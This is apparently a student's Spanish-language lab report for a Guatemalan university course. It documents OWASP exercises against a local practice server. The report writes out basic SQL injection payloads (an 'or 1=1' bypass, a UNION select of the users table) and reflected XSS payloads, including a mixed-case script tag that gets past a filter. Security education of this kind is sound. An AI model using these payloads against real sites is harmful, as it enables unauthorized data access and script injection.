Uploaded by hass19hiar

OWASP

advertisement
UNIVERSIDAD MARIANO GALVEZ DE GUATEMALA
ALUMNO: Hugo Irrael Arévalo Román
CARNÉ: 092-11-4025
Prueba : SQL– Example 1
Datos ingresados:
192.168.0.13/sqli/example1.php?name=root' or 1=1-- - Prueba:
Resultado:
Descripción del resultado de la prueba:
Se agrega 1=1-- - - para mostrar todos los usuarios.
Prueba : SQL injections – Example 4
Datos ingresados:
192.168.0.13/xss/example4.php?name=UMG2021
Prueba:
Resultado:
Descripción del resultado de la prueba:
En la url en el apartado donde dice name=Hacker el nombre Hacker se puede cambiar para
mostrar otro valor en pantalla
Prueba : SQL injections – Example 5
Datos ingresados:
192.168.0.13/sqli/example5.php?id=2 union all select * from users
Prueba:
Resultado:
Descripción del resultado de la prueba:
Lo que hacemos es unir un script para ejecutar y mostrar otros datos
Prueba : XSS – Example 2
Datos ingresados:
192.168.0.13/xss/example2.php? name=hacker<SCript>alert('xss')</SCript>
Prueba:
Resultado:
Descripción del resultado de la prueba:
En este caso se inyecto el payload de alerta veremos que ‘<script>’ y ‘</script>’ son filtrados
Prueba : XSS – Example 1
Datos ingresados:
192.168.0.13/xss/example1.php?name=hacker<script>alert('Hackplayers')</script>
Prueba:
Resultado:
Descripción del resultado de la prueba:
En este caso se hizo una ejecución de java script dentro de la url
Download